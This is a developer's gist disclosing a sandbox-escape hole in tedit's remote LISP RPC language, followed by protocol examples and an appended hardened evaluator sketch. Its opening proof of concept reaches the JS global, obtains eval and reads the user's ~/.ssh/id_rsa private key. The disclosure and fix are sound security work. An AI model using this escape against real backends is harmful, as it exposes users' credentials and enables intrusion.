@creationix
Last active August 29, 2015 14:05
Security hole in remote lisp for tedit
; Abuse the scope builtin to get access to the JS global
(def global (scope.call null))
; From that we can look up eval
(def eval global.eval)
; We can also look up environment variables
(def home global.process.env.HOME)
; And read the user's SSH key!
(readFile (+ home "/.ssh/id_rsa") "utf8")
@creationix (Author)

I'm creating an RPC protocol for tedit to connect to remote backends (though usually over localhost websocket most likely). To save on roundtrips and latency, the command language is a simplified LISP. You send a program to the backend and it sends back the result. (This is basically what SQL is to relational databases)

@creationix (Author)

A typical correct usage would be something like:

(repo.loadAs "commit" (repo.readRef "refs/heads/master"))

To read the master hash and load the commit in a single request instead of two round-trips.

@creationix (Author)

Here is a longer example:

(def head (repo.readRef "refs/heads/master"))
(def commit (repo.loadAs "commit" head))
(def root commit.tree)
(def tree (repo.loadAs "tree" root))
(def entry (tree "README.md"))
(def readme (repo.loadAs "text" entry.hash))
(object
  "head" head
  "commit" commit
  "tree" tree
  "readme" readme)

output

{
  "head": "7708d512fa78b2fbf4660f70c73741a6b7b7ac57",
  "commit": {
    "tree": "3e1a26f26f3ec73fb291bc16b8029ded2e347bc6",
    "parents": [
      "de3ae1bdd7a6429cd253d2151e3706ac865a1c49"
    ],
    "author": {
      "name": "Tim Caswell",
      "email": "tim@creationix.com",
      "date": {
        "seconds": 1407555167,
        "offset": 300
      }
    },
    "committer": {
      "name": "Tim Caswell",
      "email": "tim@creationix.com",
      "date": {
        "seconds": 1407555167,
        "offset": 300
      }
    },
    "message": "Fix submodule inside local git repo mount to work somewhat"
  },
  "tree": {
    ".gitmodules": {
      "mode": 33188,
      "hash": "605c805433af1632ea2400392e94679ada8eda15"
    },
    "LICENSE": {
      "mode": 33188,
      "hash": "626d764098d963e0b8a312cffbe3d8c6b838c585"
    },
    "README.md": {
      "mode": 33188,
      "hash": "413d5a65c19b405ea5ce45b284bb1999e15bb4fd"
    },
    "build": {
      "mode": 16384,
      "hash": "f829fddebbc28233d800c0284dcaf9f24233f34e"
    },
    "filters": {
      "mode": 57344,
      "hash": "7c055a4e0f15d70f3a97a8224b64b0ce812c5237"
    },
    "lib": {
      "mode": 16384,
      "hash": "36f7c45d30fd90e4114c8f965b1698d9f325ec6a"
    },
    "shared": {
      "mode": 16384,
      "hash": "72c4c4e38e7764cda16ce6c5e27321207a51170e"
    },
    "src-minimal": {
      "mode": 16384,
      "hash": "053a8c06d54be36fcc58ff4f6ecf298bc8f58f29"
    },
    "src-ui": {
      "mode": 16384,
      "hash": "d410e3300926eaa1c96a8e971b0c03f73493ad05"
    },
    "src": {
      "mode": 16384,
      "hash": "6fccd8fd5ff6fb112d0c66d9c250f7a1d5ab515d"
    }
  },
  "readme": "tedit-app\n=========\n\nTedit is a git based development environment.  When I say git based I mean you\ndon't edit files on disk.  You edit git databases directly.  Visually it looks\nmuch like a traditional editor complete with file tree and editor pane.  Under\nthe hood, you are browsing the git database graph and creating new nodes and\nupdating the root reference whenever you make a change.\n\nThe purpose of Tedit is to create a development platform that makes programming\nJavaScript easy and more accessable.  It runs great on ChromeBooks and soon\nthere will be a hosted web version that runs on mobile browsers on tablets.\n\nInstall at the Chrome [Web Store](https://chrome.google.com/webstore/detail/tedit-development-environ/ooekdijbnbbjdfjocaiflnjgoohnblgf)\n\n![Tedit Screenshot](http://creationix.com/tedit-0.1.12-1.png)\n\n## Hacking on Tedit\n\nSo you decided you want to help me build this awesome tool.  That's great.\n\nFirst, Tedit is a self-hosting compiler / editor / platform.  This means you\nneed Tedit to build Tedit.  Go get the chrome store version if you haven't\nalready.\n\nVisual walkthrough: <https://cloudup.com/cCMNHjdCw6q>\n\n - If you don't have a github token handy, create a new one at <https://github.com/settings/tokens/new>\n - Launch the [pre-built version of Tedit](https://chrome.google.com/webstore/detail/tedit-development-environ/ooekdijbnbbjdfjocaiflnjgoohnblgf) and using the context menu (right-click) in the\n   empty pane to the left, select \"Live Mount Github Repo\"\n - Enter `creationix/tedit-app` (or your fork if you want write access) in the first field and paste your token in the last.\n - Right-Click on the `chrome-app` folder in the new tree and select \"Live Export to Disk\".\n - Select a parent folder (I usually do Desktop) and a name for the target (I like `tedit`).\n - Watch the save icon spin while it exports the files to disk.\n - When done, open Chrome to <chrome://extensions>, enable developer mode, and add the exported folder as an unpacked extension.\n - Launch the generated version of tedit.  I recommend changing the color of this second version using `Control+B` to tell them apart.\n"
}
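The example below is added here and is not code from the gist or from tedit. It sketches the kind of evaluator the comments describe (a program of s-expressions such as `(repo.loadAs "commit" (repo.readRef "refs/heads/master"))` sent to a backend, last value returned) and shows the two properties that keep the gist's `(scope.call null)` from reaching the JS global: symbols resolve only through own properties of a null-prototype environment, and a function value is never traversed as an object, so `scope.call` is simply unbound instead of resolving to `Function.prototype.call`; every call also gets an explicit receiver, so a sloppy-mode builtin's `this` can never be coerced to the global object. The names `parse`, `lookup`, `evalForm`, `makeEnv`, `runRequest` and `SAMPLE_BACKEND` are hypothetical, the `scope` builtin is a stand-in whose shape (returning its receiver) is an assumption, and the repo data is constructed.

```javascript
// Added example, not code from the gist or from tedit: a tiny s-expression RPC
// evaluator with symbol resolution confined to an allowlisted, null-prototype
// environment, so `(scope.call null)` has no path to the JS global. All names
// (parse, lookup, evalForm, makeEnv, runRequest, SAMPLE_BACKEND) are
// hypothetical; the backend data is constructed.
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Parser: lists, double-quoted strings, integers, null and (dotted) symbols.
function parse(src) {
  const toks = src.match(/\(|\)|"(?:[^"\\]|\\.)*"|[^\s()"]+/g) || [];
  let i = 0;
  function read() {
    if (i >= toks.length) throw new SyntaxError("unexpected end of input");
    const t = toks[i++];
    if (t === "(") {
      const list = [];
      while (toks[i] !== ")") list.push(read());
      i++; // consume ")"
      return list;
    }
    if (t === ")") throw new SyntaxError("unexpected )");
    if (t[0] === '"') return JSON.parse(t);
    if (t === "null") return null;
    return /^-?\d+$/.test(t) ? Number(t) : { sym: t };
  }
  const forms = [];
  while (i < toks.length) forms.push(read());
  return forms;
}

// Resolution: a dotted path walks own properties of plain objects only. A function
// is never traversed (so `scope.call` stays unbound) and there is no prototype chain.
function lookup(env, path) {
  let owner = null, cur = env;
  for (const part of path.split(".")) {
    if (cur === null || typeof cur !== "object" || !hasOwn(cur, part)) return undefined;
    owner = cur;
    cur = cur[part];
  }
  return { value: cur, owner };
}

// Evaluator: literals, symbols, (def name expr) and (fn arg ...).
function evalForm(form, env) {
  if (!Array.isArray(form)) {
    if (form === null || typeof form !== "object") return form; // literal
    const hit = lookup(env, form.sym);
    if (hit === undefined) throw new ReferenceError("unbound: " + form.sym);
    return hit.value;
  }
  const [head, ...rest] = form;
  if (head && head.sym === "def") {
    if (!rest[0] || typeof rest[0].sym !== "string") throw new SyntaxError("def needs a symbol");
    return (env[rest[0].sym] = evalForm(rest[1], env));
  }
  // Calls always get an explicit receiver (the object the function was found on,
  // else the environment), never null, so a sloppy-mode `this` cannot become global.
  const hit = head && typeof head.sym === "string"
    ? lookup(env, head.sym) : { value: evalForm(head, env), owner: env };
  if (hit === undefined) throw new ReferenceError("unbound: " + head.sym);
  if (typeof hit.value !== "function") throw new TypeError("not callable");
  return hit.value.apply(hit.owner, rest.map((a) => evalForm(a, env)));
}

// Environment: the only names a program can reach; nothing here refers to
// globalThis, process or the filesystem.
function makeEnv(backend) {
  const env = Object.create(null);
  env.repo = Object.create(null);
  env.repo.readRef = (name) => (hasOwn(backend.refs, name) ? backend.refs[name] : null);
  env.repo.loadAs = (type, hash) => {
    const obj = hasOwn(backend.objects, hash) ? backend.objects[hash] : null;
    if (obj === null || obj.type !== type) throw new Error(`no ${type} object ${hash}`);
    return obj.body;
  };
  env.scope = function scope() { return this; }; // stand-in for the gist's `scope` builtin
  return env;
}

// Constructed sample backend: one ref, one commit, one tree (fake ids).
const SAMPLE_BACKEND = {
  refs: { "refs/heads/master": "c0ffee00" },
  objects: {
    c0ffee00: { type: "commit", body: { tree: "7ee70000", message: "constructed commit" } },
    "7ee70000": { type: "tree", body: { "README.md": { mode: 33188, hash: "b10b0000" } } },
  },
};

// One RPC round-trip: program text in, last form's value (or an error) out.
function runRequest(src, env) {
  try {
    let result = null;
    for (const form of parse(src)) result = evalForm(form, env);
    return { ok: true, result };
  } catch (e) {
    return { ok: false, error: `${e.constructor.name}: ${e.message}` };
  }
}

const demoEnv = makeEnv(SAMPLE_BACKEND);
console.log(runRequest('(repo.loadAs "commit" (repo.readRef "refs/heads/master"))', demoEnv));
console.log(runRequest("(def global (scope.call null))", demoEnv));
```

Run with `node`: the first request returns `{ ok: true, result: { tree, message } }`, while the gist's probe fails at resolution time with `ReferenceError: unbound: scope.call` and is never executed. The same `lookup` rule is what makes `global.process.env.HOME` unbound: the environment has no `global` key and no prototype to fall through to.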
